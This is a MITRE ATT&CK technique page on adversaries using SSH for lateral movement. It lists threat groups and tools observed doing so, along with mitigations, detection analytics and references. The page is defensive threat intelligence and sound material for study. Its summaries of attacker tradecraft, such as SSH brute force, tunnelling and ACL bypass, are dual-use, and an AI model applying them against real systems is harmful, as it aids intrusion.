1. Home
  2. Techniques
  3. Enterprise
  4. Remote Services
  5. SSH

Remote Services: SSH

ID Name
T1021.001 Remote Desktop Protocol
T1021.002 SMB/Windows Admin Shares
T1021.003 Distributed Component Object Model
T1021.004 SSH
T1021.005 VNC
T1021.006 Windows Remote Management
T1021.007 Cloud Services
T1021.008 Direct Cloud VM Connections

Adversaries may use Valid Accounts to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via vim-cmd hostsvc/enable_ssh) or via vCenter.[1][2][3] The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., SSH Authorized Keys).

ID: T1021.004
Sub-technique of:  T1021
Tactic: Lateral Movement
Platforms: ESXi, Linux, macOS
Contributors: Janantha Marasinghe
Version: 1.3
Created: 11 February 2020
Last Modified: 24 October 2025
Version Permalink

Procedure Examples

ID Name Description
G0087 APT39

APT39 used secure shell (SSH) to move laterally among their targets.[4]
G1023 APT5

APT5 has used SSH for lateral movement in compromised environments including for enabling access to ESXi host servers.[5]
G0143 Aquatic Panda

Aquatic Panda used SSH with captured user credentials to move laterally in victim environments.[6]
G0098 BlackTech

BlackTech has used Putty for remote access.[7]
C0032 C0032

During the C0032 campaign, TEMP.Veles relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution.[8]
S0154 Cobalt Strike

Cobalt Strike can SSH to a remote service.[9][10]
C0029 Cutting Edge

During Cutting Edge, threat actors used SSH for lateral movement.[11]
S0363 Empire

Empire contains modules for executing commands over SSH as well as in-memory VNC agent injection.[12]
G1016 FIN13

FIN13 has remotely accessed compromised environments via secure shell (SSH) for lateral movement.[13]
G0046 FIN7

FIN7 has used SSH to move laterally through victim environments.[14]
G0117 Fox Kitten

Fox Kitten has used the PuTTY and Plink tools for lateral movement.[15]
G0036 GCMAN

GCMAN uses Putty for lateral movement.[16]
G0119 Indrik Spider

Indrik Spider has used SSH for lateral movement.[17]
S0599 Kinsing

Kinsing has used SSH for lateral movement.[18]
G0032 Lazarus Group

Lazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.[19]
G0065 Leviathan

Leviathan used ssh for internal reconnaissance.[20]
C0049 Leviathan Australian Intrusions

Leviathan used SSH brute force techniques to move laterally within victim environments during Leviathan Australian Intrusions.[21]
G0045 menuPass

menuPass has used Putty Secure Copy Client (PSCP) to transfer data.[22]
G0049 OilRig

OilRig has used Putty to access compromised systems.[23]
S1187 reGeorg

reGeorg can communicate using SSH through an HTTP tunnel.[24]
G0106 Rocke

Rocke has spread its coinminer via SSH.[25]

G1045 Salt Typhoon

Salt Typhoon has modified the loopback address on compromised switches and used them as the source of SSH connections to additional devices within the target environment, allowing them to bypass access control lists (ACLs).[26]
G1015 Scattered Spider

Scattered Spider has used SSH to move laterally in victim environments and to access the vSphere vCenter Server GUI.[27][28]
G1046 Storm-1811

Storm-1811 has used OpenSSH to establish an SSH tunnel to victims for persistent access.[29]
G0139 TeamTNT

TeamTNT has used SSH to connect back to victim machines.[30] TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them.[31]
G1048 UNC3886

UNC3886 has established remote SSH access to targeted ESXi hosts.[32][33]

Mitigations

ID Mitigation Description
M1042 Disable or Remove Feature or Program

Disable the SSH daemon on systems that do not require it, especially ESXi servers. For macOS, ensure Remote Login is disabled under Sharing Preferences.[34]
M1032 Multi-factor Authentication

Require multi-factor authentication for SSH connections wherever possible, such as password protected SSH keys.
M1018 User Account Management

Limit which user accounts are allowed to login via SSH.

Detection Strategy

ID Name Analytic ID Analytic Description
DET0596 Behavioral Detection of Remote SSH Logins Followed by Post-Login Execution AN1638

SSH login from a remote system (via sshd), followed by user context execution of suspicious binaries or privilege escalation behavior.
AN1639

SSH login detected via Unified Logs, followed by unusual process execution, especially outside normal user behavior patterns.
AN1640

SSH login via hostd or /var/log/auth.log, followed by CLI access to host shell or file manipulation in restricted areas.

References

  1. Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.
  2. Junestherry Dela Cruz. (2022, January 24). Analysis and Impact of LockBit Ransomware’s First Linux and VMware ESXi Variant. Retrieved March 26, 2025.
  3. Abigail See, Zhongyuan (Aaron) Hau, Ren Jie Yow, Yoav Mazor, Omer Kidron, and Oren Biderman. (2025, February 4). The Anatomy of Abyss Locker Ransomware Attack. Retrieved April 4, 2025.
  4. Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.
  5. Perez, D. et al. (2021, May 27). Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices. Retrieved February 5, 2024.
  6. CrowdStrike. (2023). 2022 Falcon OverWatch Threat Hunting Report. Retrieved May 20, 2024.
  7. Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022.
  8. Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.
  9. Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved November 17, 2024.
  10. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.
  11. Meltzer, M. et al. (2024, January 10). Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN. Retrieved February 27, 2024.
  12. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
  13. Ta, V., et al. (2022, August 8). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved February 9, 2023.
  14. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
  15. CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.
  16. Kaspersky Lab's Global Research & Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.
  17. Mandiant Intelligence. (2022, June 2). To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions. Retrieved July 29, 2024.
  1. Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.
  2. Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.
  3. Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.
  4. CISA et al. (2024, July 8). People’s Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action. Retrieved February 3, 2025.
  5. PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
  6. Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.
  7. FortiGard Labs. (2019, March 12). ReGeorg.HTTP.Tunnel. Retrieved December 3, 2024.
  8. Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.
  9. Cisco Talos. (2025, February 20). Weathering the storm: In the midst of a Typhoon. Retrieved February 24, 2025.
  10. Mandiant Incident Response. (2025, May 6). Defending Against UNC3944: Cybercrime Hardening Guidance from the Frontlines. Retrieved October 13, 2025.
  11. Mandiant Incident Response. (2025, July 23). From Help Desk to Hypervisor: Defending Your VMware vSphere Estate from UNC3944. Retrieved October 13, 2025.
  12. Microsoft Threat Intelligence. (2024, May 15). Threat actors misusing Quick Assist in social engineering attacks leading to ransomware. Retrieved March 14, 2025.
  13. Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.
  14. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.
  15. Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025.
  16. Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.
  17. Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.